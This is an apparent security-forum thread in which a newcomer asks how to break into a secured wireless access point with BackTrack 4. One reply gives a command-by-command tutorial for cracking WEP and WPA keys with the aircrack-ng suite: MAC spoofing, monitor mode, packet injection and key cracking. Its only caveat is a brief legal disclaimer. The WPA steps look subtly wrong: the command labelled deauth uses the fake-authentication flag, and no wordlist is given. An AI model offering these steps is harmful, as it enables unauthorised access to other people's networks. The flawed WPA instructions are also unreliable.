Hey guys, new here...
I'm interested in learning how to gain access to a secured wireless AP. I have seen some great guides on the web using BT 2 and 3 but nothing for version 4. I assumed there would be one listed in this forum here but can't seem to find anything. Can someone tell me if a BT 3 guide will work with BT 4? I've read that BT 3 commands were very different from BT 2 and so am worried that BT 4 will be different than BT 3.
thanks
What type of AP is it?
Search for a guy named Mushroomheadbanger on YouTube. He's got some pretty easy-to-follow guides on how to break WEP and WPA.
I have a LevelOne router that I will be testing it on. I'm just trying to find a guide like the ones I have seen for BackTrack 2 and 3. I will be glad to follow the version 3 guide that I found on the internet if anyone here can confirm it will work. I would give you the link to the guide I found but don't believe posting links is acceptable.
What the...? You really want someone to answer that?
Next time, don't ask if it WILL work. Test first, and if something doesn't work, search for a solution, and ONLY after you've done lots and lots of searching, if you still can't find a solution, try and get help here.
Try harder.
Are you kidding me? You act like I wanted to be spoon fed or something. This forum offers many How To's, yet I didn't see one listed for wireless security cracking. I was only asking if there is a guide or how-to so I can get started with "Trying Harder" to learn where to get started. I have already read guides for BackTrack 2 and 3, and now 4 is out and I was curious if there was a guide for the 4th version. I've read that BT 4 does use a new kernel and commands, so I can't see how version 3's guide with all its specific commands will work with BT 4. I'll just keep looking for a guide, I'm bound to find one. Just thought the site that offers the software would have a "How To".
I don't guess you would know why this forum doesn't offer a How To for this task would you?
Mike
Thanks I will check into that.
Last edited by lupin; 02-08-2010 at 09:21 AM. Reason: Merging..
Alright, settle down people.
@Modify_inc, many of the various attack tools on BackTrack 3 and 4 will work in similar ways because they generally differ in version number only (with the tools in BT4 being more recent), and in addition, many of the tools from BT3 made it into 4. The differences between the BackTrack versions are more in the area of the base distribution, the packaging system and the repository, so it's quite likely that tutorials on Wireless Cracking written for BT3 will still work in BT4 as long as the required tool is still present.
My advice is to give it a go and see.
Capitalisation is important. It's the difference between "Helping your brother Jack off a horse" and "Helping your brother jack off a horse".
The Forum Rules, Forum FAQ and the BackTrack Wiki... learn them, love them, live them.
Because no one has made a comprehensive (good quality) guide.
Not to mention everyone and their dog has made a WEP cracking video, and it's really not cool.
Now if you can get it done using an install of BT4 on a dead badger, then, my friend, you have done something kewl.
Last edited by Archangel-Amael; 02-08-2010 at 02:31 PM.
Hi fellaz,
For those in need of simple WEP/WPA tuts, try this:
First steps for USB in VMware:
Please note I'm not an expert, but I've tried all sorts of ways to do this
and this is by far the easiest and most reliable. For me anyway...
# = commands to use
VMware:
Boot up
insert WiFi card
check VM removable devices for card
#lsusb to see if card is on system
#iwconfig to check card's interface name, i.e. wlan0 or ra0 rausb0
#macchanger 00:11:22:33:44:55 (i.e.) wlan0
Put card into monitor mode to capture packets or "info":
#airmon-ng start wlan0
#airodump-ng wlan0
find your specific network and copy the BSSID MAC address
then use the following commands and replace the MAC address where it says:
#airodump-ng wlan0 -c(channel) -w (capture) --bssid (ap mac add) wlan0
Then follow the steps below based on your type of encryption, in separate windows.
-----------------------------------------------------------------------------------------------
WEP ATTACK:
1: #aireplay-ng -1 0 -a (ap mac add) -h 00:11:22:33:44:55 wlan0 (to associate)
2: #aireplay-ng -3 -b (ap mac add) -h 00:11:22:33:44:55 wlan0 (to replay packets injected)
and wait for the ARP reply, and boom, you should see the data column in airodump-ng shoot up.
Wait till you've got about 5000 IVs, which is the data you need to decrypt the key, and then
in a new window:
3: #aircrack-ng capture*.cap (the * is the wildcard to use all capture files, saving you looking for
a specific one if you do a lot of scans).
Then wait... You should see a network list; pick your number and then it will start to
crack it. If it says not enough IVs, don't worry, leave it running; it will carry on once you've got
10,000 and start to crack until it works. Usually takes me about 3-4 mins with a good enough signal.
-----------------------------------------------------------------------------------------------
WPA ATTACK:
deauth for client (wait for handshake)
#aireplay-ng -1 10 -a (apmac) -c (client Mac) wlan0
-----------------------------------------------------------------------------------------------
aircrack-ng capture*.cap
------------------------------------------------------------------------------------------------
Hope this helps. Please note: you could have MAC filtering problems, but there are ways to clone etc.
All info for pentest purposes and not nicking your street's WiFi; ILLEGAL.........ILLEGAL....
Dee
"macchanger 00:11:22:33:44:55 (i.e.) wlan0"
If nothing illegal, why all the extra steps, MAC changing and all? Seems like a lot of extra typing just to see if something would work, not to mention the fact that it is your AP.